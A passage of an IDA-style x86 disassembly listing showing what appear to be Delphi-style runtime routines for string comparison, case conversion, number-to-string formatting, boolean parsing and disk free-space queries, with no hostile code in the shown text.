pop edi
pop esi
pop ebx
jmp sub_40004884
sub_400079BC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007A58 proc near ; CODE XREF: sub_4001145C+66�p
push ebx
push esi
push edi
mov esi, eax
mov eax, edx
test esi, esi
jz loc_40007AE8
mov edx, [esi-4]
mov edi, eax
test edx, edx
jle short loc_40007AE8
mov ecx, [eax]
mov ebx, edx
test ecx, ecx
jz short loc_40007A9B
test edx, 3
jnz short loc_40007A8A
xor edx, [ecx-4]
cmp edx, 3
jbe short loc_40007A95
jmp short loc_40007A9B
; ---------------------------------------------------------------------------
loc_40007A8A: ; CODE XREF: sub_40007A58+26�j
or edx, 2
xor edx, [ecx-4]
cmp edx, 1
ja short loc_40007A9B
loc_40007A95: ; CODE XREF: sub_40007A58+2E�j
cmp dword ptr [ecx-8], 1
jz short loc_40007AA5
loc_40007A9B: ; CODE XREF: sub_40007A58+1E�j
; sub_40007A58+30�j ...
mov edx, ebx
or edx, 3
call sub_40004F74
loc_40007AA5: ; CODE XREF: sub_40007A58+41�j
mov edi, [edi]
mov [edi-4], ebx
mov byte ptr [edi+ebx], 0
add ebx, 0FFFFFFFFh
and ebx, 0FFFFFFFCh
mov eax, [esi+ebx]
loc_40007AB7: ; CODE XREF: sub_40007A58+8A�j
mov ecx, eax
or eax, 80808080h
mov edx, eax
sub eax, 5B5B5B5Bh
xor edx, ecx
or eax, 80808080h
sub eax, 66666666h
and eax, edx
shr eax, 2
xor eax, ecx
mov [edi+ebx], eax
mov eax, [esi+ebx-4]
sub ebx, 4
jge short loc_40007AB7
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40007AE8: ; CODE XREF: sub_40007A58+9�j
; sub_40007A58+16�j
pop edi
pop esi
pop ebx
jmp sub_40004884
sub_40007A58 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007AF4 proc near ; CODE XREF: sub_40007B90+14�p
test eax, eax
jnz short loc_40007B02
test edx, edx
jz short locret_40007B01
mov eax, [edx-4]
neg eax
locret_40007B01: ; CODE XREF: sub_40007AF4+6�j
retn
; ---------------------------------------------------------------------------
loc_40007B02: ; CODE XREF: sub_40007AF4+2�j
test edx, edx
jnz short loc_40007B0A
mov eax, [eax-4]
retn
; ---------------------------------------------------------------------------
loc_40007B0A: ; CODE XREF: sub_40007AF4+10�j
push ebx
push ebp
push esi
mov ebp, [eax-4]
mov ebx, [edx-4]
sub ebp, ebx
sbb ecx, ecx
and ecx, ebp
add ecx, ebx
lea esi, [ecx+eax]
add edx, ecx
neg ecx
jz short loc_40007B87
loc_40007B24: ; CODE XREF: sub_40007AF4+91�j
movzx eax, word ptr [ecx+esi]
movzx ebx, word ptr [ecx+edx]
cmp eax, ebx
jz short loc_40007B82
cmp al, bl
jz short loc_40007B60
mov ah, 0
mov bh, 0
cmp al, 61h
jl short loc_40007B43
cmp al, 7Ah
jg short loc_40007B43
sub eax, 20h
loc_40007B43: ; CODE XREF: sub_40007AF4+46�j
; sub_40007AF4+4A�j
cmp bl, 61h
jl short loc_40007B50
cmp bl, 7Ah
jg short loc_40007B50
sub ebx, 20h
loc_40007B50: ; CODE XREF: sub_40007AF4+52�j
; sub_40007AF4+57�j
sub eax, ebx
jnz short loc_40007B89
movzx eax, word ptr [ecx+esi]
movzx ebx, word ptr [ecx+edx]
cmp ah, bh
jz short loc_40007B82
loc_40007B60: ; CODE XREF: sub_40007AF4+3E�j
shr eax, 8
shr ebx, 8
cmp al, 61h
jl short loc_40007B71
cmp al, 7Ah
jg short loc_40007B71
sub eax, 20h
loc_40007B71: ; CODE XREF: sub_40007AF4+74�j
; sub_40007AF4+78�j
cmp bl, 61h
jl short loc_40007B7E
cmp bl, 7Ah
jg short loc_40007B7E
sub ebx, 20h
loc_40007B7E: ; CODE XREF: sub_40007AF4+80�j
; sub_40007AF4+85�j
sub eax, ebx
jnz short loc_40007B89
loc_40007B82: ; CODE XREF: sub_40007AF4+3A�j
; sub_40007AF4+6A�j
add ecx, 2
jl short loc_40007B24
loc_40007B87: ; CODE XREF: sub_40007AF4+2E�j
mov eax, ebp
loc_40007B89: ; CODE XREF: sub_40007AF4+5E�j
; sub_40007AF4+8C�j
pop esi
pop ebp
pop ebx
retn
sub_40007AF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40007B90 proc near ; CODE XREF: sub_40013618+1B�p
; sub_40013CE4+64�p
cmp eax, edx
jz short loc_40007BAD
or eax, eax
jz short locret_40007BAF
or edx, edx
jz short loc_40007BB0
mov ecx, [eax-4]
cmp ecx, [edx-4]
jnz short loc_40007BB0
call sub_40007AF4
test eax, eax
jnz short loc_40007BB0
loc_40007BAD: ; CODE XREF: sub_40007B90+2�j
mov al, 1
locret_40007BAF: ; CODE XREF: sub_40007B90+6�j
retn
; ---------------------------------------------------------------------------
loc_40007BB0: ; CODE XREF: sub_40007B90+A�j
; sub_40007B90+12�j ...
xor eax, eax
retn
sub_40007B90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007BB4 proc near ; CODE XREF: sub_4000A1CC+2B6�p
; sub_4000A1CC+2E0�p
push ebx
push esi
push edi
push ebp
mov ebp, edx
mov edi, eax
mov ebx, edi
test ebx, ebx
jz short loc_40007BC7
sub ebx, 4
mov ebx, [ebx]
loc_40007BC7: ; CODE XREF: sub_40007BB4+C�j
mov esi, ebp
test esi, esi
jz short loc_40007BD2
sub esi, 4
mov esi, [esi]
loc_40007BD2: ; CODE XREF: sub_40007BB4+17�j
push esi
mov eax, ebp
call sub_40004D48
push eax
push ebx
mov eax, edi
call sub_40004D48
push eax
push 1
push 400h
call sub_400064F8 ; CompareStringA
sub eax, 2
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40007BB4 endp
; =============== S U B R O U T I N E =======================================
sub_40007BF8 proc near ; CODE XREF: sub_4000A1CC+80�p
push ebx
push esi
push edi
push ebp
mov ebp, edx
mov edi, eax
mov eax, edi
test eax, eax
jz short loc_40007C0B
sub eax, 4
mov eax, [eax]
loc_40007C0B: ; CODE XREF: sub_40007BF8+C�j
mov esi, eax
mov ebx, 1
jmp short loc_40007C15
; ---------------------------------------------------------------------------
loc_40007C14: ; CODE XREF: sub_40007BF8+26�j
inc ebx
loc_40007C15: ; CODE XREF: sub_40007BF8+1A�j
cmp esi, ebx
jl short loc_40007C20
cmp byte ptr [edi+ebx-1], 20h
jbe short loc_40007C14
loc_40007C20: ; CODE XREF: sub_40007BF8+1F�j
cmp esi, ebx
jge short loc_40007C2E
mov eax, ebp
call sub_40004884
jmp short loc_40007C44
; ---------------------------------------------------------------------------
loc_40007C2D: ; CODE XREF: sub_40007BF8+3B�j
dec esi
loc_40007C2E: ; CODE XREF: sub_40007BF8+2A�j
cmp byte ptr [edi+esi-1], 20h
jbe short loc_40007C2D
push ebp
mov ecx, esi
sub ecx, ebx
inc ecx
mov edx, ebx
mov eax, edi
call sub_40004DA8
loc_40007C44: ; CODE XREF: sub_40007BF8+33�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40007BF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007C4C proc near ; CODE XREF: sub_40007C98+B�p
; sub_40007DAC+13�p ...
or cl, cl
jnz short loc_40007C67
or eax, eax
jns short sub_40007C62
neg eax
call sub_40007C62
mov al, 2Dh
inc ecx
dec esi
mov [esi], al
retn
sub_40007C4C endp
; =============== S U B R O U T I N E =======================================
sub_40007C62 proc near ; CODE XREF: sub_40007C4C+6�j
; sub_40007C4C+A�p
mov ecx, 0Ah
loc_40007C67: ; CODE XREF: sub_40007C4C+2�j
push edx
push esi
loc_40007C69: ; CODE XREF: sub_40007C62+1B�j
xor edx, edx
div ecx
dec esi
add dl, 30h
cmp dl, 3Ah
jb short loc_40007C79
add dl, 7
loc_40007C79: ; CODE XREF: sub_40007C62+12�j
mov [esi], dl
or eax, eax
jnz short loc_40007C69
pop ecx
pop edx
sub ecx, esi
sub edx, ecx
jbe short locret_40007C97
add ecx, edx
mov al, 30h
sub esi, edx
jmp short loc_40007C92
; ---------------------------------------------------------------------------
loc_40007C8F: ; CODE XREF: sub_40007C62+31�j
mov [edx+esi], al
loc_40007C92: ; CODE XREF: sub_40007C62+2B�j
dec edx
jnz short loc_40007C8F
mov [esi], al
locret_40007C97: ; CODE XREF: sub_40007C62+23�j
retn
sub_40007C62 endp
; =============== S U B R O U T I N E =======================================
sub_40007C98 proc near ; CODE XREF: sub_400116DC+C9�p
; sub_400116DC+E3�p ...
push esi
mov esi, esp
sub esp, 10h
xor ecx, ecx
push edx
xor edx, edx
call sub_40007C4C
mov edx, esi
pop eax
call sub_40004974
add esp, 10h
pop esi
retn
sub_40007C98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007CB8 proc near ; CODE XREF: sub_40007D84+11�p
; sub_4000843E+94�j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
or cl, cl
jnz short sub_40007CEC
mov ecx, 0Ah
test dword ptr [eax+4], 80000000h
jz short sub_40007CEC
push dword ptr [eax+4]
push dword ptr [eax]
mov eax, esp
neg [esp+8+var_8]
adc [esp+8+var_4], 0
neg [esp+8+var_4]
call sub_40007CEC
mov byte ptr [esi-1], 2Dh
dec esi
inc ecx
add esp, 8
retn
sub_40007CB8 endp
; =============== S U B R O U T I N E =======================================
sub_40007CEC proc near ; CODE XREF: sub_40007CB8+2�j
; sub_40007CB8+10�j ...
var_18 = qword ptr -18h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_6 = word ptr -6
push esi
sub esp, 4
fnstcw [esp+8+var_6]
fnstcw [esp+8+var_8]
or [esp+8+var_8], 0F00h
fldcw [esp+8+var_8]
mov [esp+8+var_8], cx
fld1
test dword ptr [eax+4], 80000000h
jz short loc_40007D36
push dword ptr [eax+4]
push dword ptr [eax]
and [esp+10h+var_C], 7FFFFFFFh
push 7FFFFFFFh
push 0FFFFFFFFh
fild qword ptr [esp+8]
fild [esp+18h+var_18]
fadd st, st(2)
faddp st(1), st
add esp, 10h
jmp short loc_40007D38
; ---------------------------------------------------------------------------
loc_40007D36: ; CODE XREF: sub_40007CEC+21�j
fild qword ptr [eax]
loc_40007D38: ; CODE XREF: sub_40007CEC+48�j
fild [esp+8+var_8]
fld st(1)
loc_40007D3D: ; CODE XREF: sub_40007CEC+6E�j
dec esi
fprem
fistp [esp+8+var_8]
fdiv st(1), st
mov al, byte ptr [esp+8+var_8]
add al, 30h
cmp al, 3Ah
jb short loc_40007D50
add al, 7
loc_40007D50: ; CODE XREF: sub_40007CEC+60�j
mov [esi], al
fld st(1)
fcom st(3)
fstsw ax
sahf
jnb short loc_40007D3D
fldcw [esp+8+var_6]
add esp, 4
ffree st(3)
ffree st(2)
ffree st(1)
ffree st
pop ecx
sub ecx, esi
sub edx, ecx
jbe short locret_40007D82
sub esi, edx
mov al, 30h
add ecx, edx
jmp short loc_40007D7D
; ---------------------------------------------------------------------------
loc_40007D7A: ; CODE XREF: sub_40007CEC+92�j
mov [edx+esi], al
loc_40007D7D: ; CODE XREF: sub_40007CEC+8C�j
dec edx
jnz short loc_40007D7A
mov [esi], al
locret_40007D82: ; CODE XREF: sub_40007CEC+84�j
retn
sub_40007CEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40007D84 proc near ; CODE XREF: sub_400116DC+20E�p
; sub_400116DC+22B�p ...
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push esi
mov esi, esp
sub esp, 20h
xor ecx, ecx
push eax
xor edx, edx
lea eax, [ebp+arg_0]
call sub_40007CB8
mov edx, esi
pop eax
call sub_40004974
add esp, 20h
pop esi
pop ebp
retn 8
sub_40007D84 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007DAC proc near ; CODE XREF: sub_4001293C+CD�p
cmp edx, 20h
jbe short loc_40007DB3
xor edx, edx
loc_40007DB3: ; CODE XREF: sub_40007DAC+3�j
push esi
mov esi, esp
sub esp, 20h
push ecx
mov ecx, 10h
call sub_40007C4C
mov edx, esi
pop eax
call sub_40004974
add esp, 20h
pop esi
retn
sub_40007DAC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007DD4 proc near ; CODE XREF: sub_4000AA7C+3E�p
; sub_4000AAF4+34�p ...
var_8 = dword ptr -8
push ebx
push ecx
mov ebx, edx
mov edx, esp
call sub_4000379C
cmp [esp+8+var_8], 0
jz short loc_40007DE7
mov eax, ebx
loc_40007DE7: ; CODE XREF: sub_40007DD4+F�j
pop edx
pop ebx
retn
sub_40007DD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007DEC proc near ; CODE XREF: sub_4000CE4C+35�p
; sub_4000EBF8+61�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, edx
mov ebx, eax
mov edx, esp
mov eax, ebx
call sub_4000379C
mov [esi], eax
cmp [esp+0Ch+var_C], 0
setz al
pop edx
pop esi
pop ebx
retn
sub_40007DEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40007E0C proc near ; CODE XREF: sub_4000F6A8+3A�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, edx
mov ebx, eax
mov edx, esp
mov eax, ebx
call sub_40005754
mov [esi], eax
mov [esi+4], edx
cmp [esp+0Ch+var_C], 0
setz al
pop edx
pop esi
pop ebx
retn
sub_40007E0C endp
; =============== S U B R O U T I N E =======================================
sub_40007E2C proc near ; CODE XREF: sub_40007F40:loc_40007F6F�p
; sub_40007FDC+A�p
mov eax, ds:dword_4001E910
call sub_4000596C
test eax, eax
jnz short loc_40007E63
push 1
mov eax, offset dword_4001E910
mov ecx, 1
mov edx, ds:off_400077D8
call sub_40005B28
add esp, 4
mov eax, ds:dword_4001E910
mov edx, offset aTrue ; "True"
call sub_400048D8
loc_40007E63: ; CODE XREF: sub_40007E2C+C�j
mov eax, ds:dword_4001E914
call sub_4000596C
test eax, eax
jnz short locret_40007E9A
push 1
mov eax, offset dword_4001E914
mov ecx, 1
mov edx, ds:off_400077FC
call sub_40005B28
add esp, 4
mov eax, ds:dword_4001E914
mov edx, offset aFalse ; "False"
call sub_400048D8
locret_40007E9A: ; CODE XREF: sub_40007E2C+43�j
retn
sub_40007E2C endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 4
aTrue db 'True',0 ; DATA XREF: sub_40007E2C+2D�o
align 4
dd 0FFFFFFFFh, 5
aFalse db 'False',0 ; DATA XREF: sub_40007E2C+64�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40007EBC proc near ; CODE XREF: sub_40007F40+46�p
; sub_40007F40+69�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
mov [ebp+var_1], 0
test edx, edx
jl short loc_40007F33
inc edx
mov [ebp+var_C], edx
mov ebx, eax
loc_40007ED3: ; CODE XREF: sub_40007EBC+75�j
mov eax, [ebp+arg_0]
mov eax, [eax-4]
mov [ebp+var_10], eax
mov eax, [ebx]
mov [ebp+var_14], eax
mov esi, [ebp+var_10]
test esi, esi
jz short loc_40007EED
sub esi, 4
mov esi, [esi]
loc_40007EED: ; CODE XREF: sub_40007EBC+2A�j
mov edi, [ebp+var_14]
test edi, edi
jz short loc_40007EF9
sub edi, 4
mov edi, [edi]
loc_40007EF9: ; CODE XREF: sub_40007EBC+36�j
push edi
mov eax, [ebp+var_14]
call sub_40004D48
push eax
push esi
mov eax, [ebp+var_10]
call sub_40004D48
push eax
push 1
push 400h
call sub_400064F8 ; CompareStringA
sub eax, 2
test eax, eax
setz al
test al, al
jz short loc_40007F2B
mov [ebp+var_1], 1
jmp short loc_40007F33
; ---------------------------------------------------------------------------
loc_40007F2B: ; CODE XREF: sub_40007EBC+67�j
add ebx, 4
dec [ebp+var_C]
jnz short loc_40007ED3
loc_40007F33: ; CODE XREF: sub_40007EBC+F�j
; sub_40007EBC+6D�j
movzx eax, [ebp+var_1]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40007EBC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40007F40 proc near ; CODE XREF: sub_4000D068+3B�p
; sub_4000FCA4+6C�p
var_10 = tbyte ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov ebx, edx
mov [ebp+var_4], eax
lea edx, [ebp+var_10]
mov eax, [ebp+var_4]
call sub_40008E74
mov edx, eax
test dl, dl
jz short loc_40007F6F
fld [ebp+var_10]
fcomp ds:flt_40007FC0
fstsw ax
sahf
setnz byte ptr [ebx]
jmp short loc_40007FB8
; ---------------------------------------------------------------------------
loc_40007F6F: ; CODE XREF: sub_40007F40+1B�j
call sub_40007E2C
push ebp
mov eax, ds:dword_4001E910
call sub_40005974
mov edx, eax
mov eax, ds:dword_4001E910
call sub_40007EBC
pop ecx
mov edx, eax
test dl, dl
jz short loc_40007F97
mov byte ptr [ebx], 1
jmp short loc_40007FB8
; ---------------------------------------------------------------------------
loc_40007F97: ; CODE XREF: sub_40007F40+50�j
push ebp
mov eax, ds:dword_4001E914
call sub_40005974
mov edx, eax
mov eax, ds:dword_4001E914
call sub_40007EBC
pop ecx
mov edx, eax
test dl, dl
jz short loc_40007FB8
mov byte ptr [ebx], 0
loc_40007FB8: ; CODE XREF: sub_40007F40+2D�j
; sub_40007F40+55�j ...
mov eax, edx
pop ebx
mov esp, ebp
pop ebp
retn
sub_40007F40 endp
; ---------------------------------------------------------------------------
align 10h
flt_40007FC0 dd 0.0 ; DATA XREF: sub_40007F40+20�r
dd 0FFFFFFFFh, 1
dword_40007FCC dd 30h, 0FFFFFFFFh, 2, 312Dh ; .data:4001A858�o
; =============== S U B R O U T I N E =======================================
sub_40007FDC proc near ; CODE XREF: sub_4000D1CC+3C�p
push ebx
push esi
mov esi, ecx
mov ebx, eax
test dl, dl
jz short loc_40008012
call sub_40007E2C
test bl, bl
jz short loc_40008000
mov eax, esi
mov edx, ds:dword_4001E910
mov edx, [edx]
call sub_400048D8
jmp short loc_40008023
; ---------------------------------------------------------------------------
loc_40008000: ; CODE XREF: sub_40007FDC+11�j
mov eax, esi
mov edx, ds:dword_4001E914
mov edx, [edx]
call sub_400048D8
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40008012: ; CODE XREF: sub_40007FDC+8�j
mov eax, esi
movzx edx, bl
mov edx, off_4001A854[edx*4]
call sub_400048D8
loc_40008023: ; CODE XREF: sub_40007FDC+22�j
pop esi
pop ebx
retn
sub_40007FDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008028 proc near ; CODE XREF: sub_40015E94+11�p
; sub_40015E94+2E�p
push ebx
push esi
mov esi, eax
mov eax, esi
test eax, eax
jz short loc_40008037
sub eax, 4
mov eax, [eax]
loc_40008037: ; CODE XREF: sub_40008028+8�j
mov ebx, eax
test ebx, ebx
jz short loc_40008054
jmp short loc_40008040
; ---------------------------------------------------------------------------
loc_4000803F: ; CODE XREF: sub_40008028+23�j
dec ebx
loc_40008040: ; CODE XREF: sub_40008028+15�j
mov edx, ebx
mov eax, esi
call sub_4000B914
cmp al, 2
jz short loc_4000803F
lea eax, [esi+ebx-1]
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40008054: ; CODE XREF: sub_40008028+13�j
xor eax, eax
pop esi
pop ebx
retn
sub_40008028 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000805C proc near ; CODE XREF: sub_400080B0+E�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
mov eax, esi
test eax, eax
jz short loc_4000806F
sub eax, 4
mov eax, [eax]
loc_4000806F: ; CODE XREF: sub_4000805C+C�j
mov edi, eax
mov eax, ebx
call sub_40004D48
mov ebp, eax
test edi, edi
jle short loc_400080A7
loc_4000807E: ; CODE XREF: sub_4000805C+49�j
movzx ebx, byte ptr [esi+edi-1]
test bl, bl
jz short loc_400080A2
mov edx, ebx
mov eax, ebp
call sub_40008224
test eax, eax
jz short loc_400080A2
mov edx, edi
mov eax, esi
call sub_4000B914
cmp al, 2
jnz short loc_400080A7
dec edi
loc_400080A2: ; CODE XREF: sub_4000805C+29�j
; sub_4000805C+36�j
dec edi
test edi, edi
jg short loc_4000807E
loc_400080A7: ; CODE XREF: sub_4000805C+20�j
; sub_4000805C+43�j
mov eax, edi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000805C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400080B0 proc near ; CODE XREF: sub_4000B488+CC�p
push ebx
push esi
push edi
mov edi, edx
mov ebx, eax
mov edx, ebx
mov eax, offset dword_400080E4
call sub_4000805C
mov esi, eax
push edi
lea edx, [esi+1]
mov ecx, 7FFFFFFFh
mov eax, ebx
call sub_40004DA8
pop edi
pop esi
pop ebx
retn
sub_400080B0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_400080E4 dd 3A5Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400080E8 proc near ; DATA XREF: sub_4000C4D8+2A�o
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_400080F8
xor eax, eax
loc_400080F8: ; CODE XREF: sub_400080E8+C�j
lea edx, [ebp+var_10]
push edx
lea edx, [ebp+var_C]
push edx
lea edx, [ebp+var_8]
push edx
lea edx, [ebp+var_4]
push edx
push eax
call sub_40006570 ; GetDiskFreeSpaceA
mov ebx, eax
mov eax, [ebp+var_4]
imul [ebp+var_8]
xor edx, edx
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov eax, [ebp+var_C]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
call sub_4000569C
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ecx+4], edx
mov eax, [ebp+var_10]
xor edx, edx
push edx
push eax
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
call sub_4000569C
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov [ecx+4], edx
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_400080E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000815C proc near ; CODE XREF: sub_4000868C+16�p
; sub_4000ADE0+BD�p ...
mov edx, edi
mov edi, eax
mov ecx, 0FFFFFFFFh
xor al, al
repne scasb
mov eax, 0FFFFFFFEh
sub eax, ecx
mov edi, edx
retn
sub_4000815C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008174 proc near ; CODE XREF: sub_4000828C+2B�p
push esi
mov esi, eax
xchg eax, edx
call sub_40002DFC
mov eax, esi
pop esi
retn
sub_40008174 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008184 proc near ; CODE XREF: sub_400081B8+1F�p
; sub_4000ADE0+91�p
push edi
push esi
push ebx
mov esi, eax
mov edi, edx
mov ebx, ecx
xor al, al
test ecx, ecx
jz short loc_40008198
repne scasb
jnz short loc_40008198
inc ecx
loc_40008198: ; CODE XREF: sub_40008184+D�j
; sub_40008184+11�j
sub ebx, ecx
mov edi, esi
mov esi, edx
mov edx, edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
stosb
mov eax, edx
pop ebx
pop esi
pop edi
retn
sub_40008184 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400081B8 proc near ; CODE XREF: sub_40014F8C+14E�p
; sub_40014F8C+169�p
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
mov ebx, esi
test ebx, ebx
jz short loc_400081CA
sub ebx, 4
mov ebx, [ebx]
loc_400081CA: ; CODE XREF: sub_400081B8+B�j
mov eax, esi
call sub_40004D48
mov edx, eax
mov ecx, ebx
mov eax, edi
call sub_40008184
pop edi
pop esi
pop ebx
retn
sub_400081B8 endp
; =============== S U B R O U T I N E =======================================
sub_400081E0 proc near ; CODE XREF: sub_400096A8+388�p
; sub_400096A8+39D�p ...
push edi
push esi
push ebx
mov edi, edx
mov esi, eax
mov ebx, ecx
xor eax, eax
or ecx, ecx
jz short loc_4000821E
repne scasb
sub ebx, ecx
mov ecx, ebx
mov edi, edx
xor edx, edx
loc_400081F9: ; CODE XREF: sub_400081E0+3C�j
repe cmpsb
jz short loc_4000821E
mov al, [esi-1]
cmp al, 61h
jb short loc_4000820A
cmp al, 7Ah
ja short loc_4000820A
sub al, 20h
loc_4000820A: ; CODE XREF: sub_400081E0+22�j
; sub_400081E0+26�j
mov dl, [edi-1]
cmp dl, 61h
jb short loc_4000821A
cmp dl, 7Ah
ja short loc_4000821A
sub dl, 20h
loc_4000821A: ; CODE XREF: sub_400081E0+30�j
; sub_400081E0+35�j
sub eax, edx
jz short loc_400081F9
loc_4000821E: ; CODE XREF: sub_400081E0+D�j
; sub_400081E0+1B�j
pop ebx
pop esi
pop edi
retn
sub_400081E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008224 proc near ; CODE XREF: sub_4000805C+2F�p
; sub_4000BD04+B�p ...
jmp short loc_4000822E
; ---------------------------------------------------------------------------
loc_40008226: ; CODE XREF: sub_40008224+F�j
test cl, cl
jnz short loc_4000822D
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4000822D: ; CODE XREF: sub_40008224+4�j
inc eax
loc_4000822E: ; CODE XREF: sub_40008224�j
movzx ecx, byte ptr [eax]
cmp dl, cl
jnz short loc_40008226
retn
sub_40008224 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008238 proc near ; CODE XREF: sub_4000BC30+3B�p
; sub_4000BC30+7C�p
push edi
push esi
push ebx
or eax, eax
jz short loc_40008283
or edx, edx
jz short loc_40008283
mov ebx, eax
mov edi, edx
xor al, al
mov ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
jz short loc_40008283
mov esi, ecx
mov edi, ebx
mov ecx, 0FFFFFFFFh
repne scasb
not ecx
sub ecx, esi
jbe short loc_40008283
mov edi, ebx
lea ebx, [esi-1]
loc_4000826B: ; CODE XREF: sub_40008238+44�j
mov esi, edx
lodsb
repne scasb
jnz short loc_40008283
mov eax, ecx
push edi
mov ecx, ebx
repe cmpsb
pop edi
mov ecx, eax
jnz short loc_4000826B
lea eax, [edi-1]
jmp short loc_40008285
; ---------------------------------------------------------------------------
loc_40008283: ; CODE XREF: sub_40008238+5�j
; sub_40008238+9�j ...
xor eax, eax
loc_40008285: ; CODE XREF: sub_40008238+49�j
pop ebx
pop esi
pop edi
retn
sub_40008238 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000828C proc near ; CODE XREF: sub_4000843E+7D�p
var_34 = byte ptr -34h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFD8h
mov ebx, ecx
mov esi, edx
mov edi, eax
cmp ebx, 1Fh
jbe short loc_400082A2
mov ebx, 1Fh
loc_400082A2: ; CODE XREF: sub_4000828C+F�j
mov edx, ebx
dec edx
mov eax, esi
call sub_4000B938
cmp al, 1
jnz short loc_400082B1
dec ebx
loc_400082B1: ; CODE XREF: sub_4000828C+22�j
mov eax, esp
mov ecx, ebx
mov edx, esi
call sub_40008174
mov [esp+ebx+34h+var_34], 0
mov eax, esp
mov [esp+34h+var_14], eax
mov [esp+34h+var_10], 6
lea edx, [esp+34h+var_14]
mov eax, off_4001A85C[edi*4]
xor ecx, ecx
call sub_40007998
add esp, 28h
pop edi
pop esi
pop ebx
retn
sub_4000828C endp
; =============== S U B R O U T I N E =======================================
sub_400082E4 proc near ; CODE XREF: sub_4000843E+114�p
push ebx
mov ecx, off_4001B0B4
cmp dword ptr [ecx], 0
jz short loc_400082FC
mov ebx, off_4001B0B4
mov ebx, [ebx]
call ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_400082FC: ; CODE XREF: sub_400082E4+A�j
mov al, 10h
call sub_40002D50
sub_400082E4 endp
; ---------------------------------------------------------------------------
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008308 proc near ; CODE XREF: sub_40008314+D3�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_40004884
pop ebx
retn
sub_40008308 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008314 proc near ; CODE XREF: sub_4000868C+2A�p
; sub_400086E0+54�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
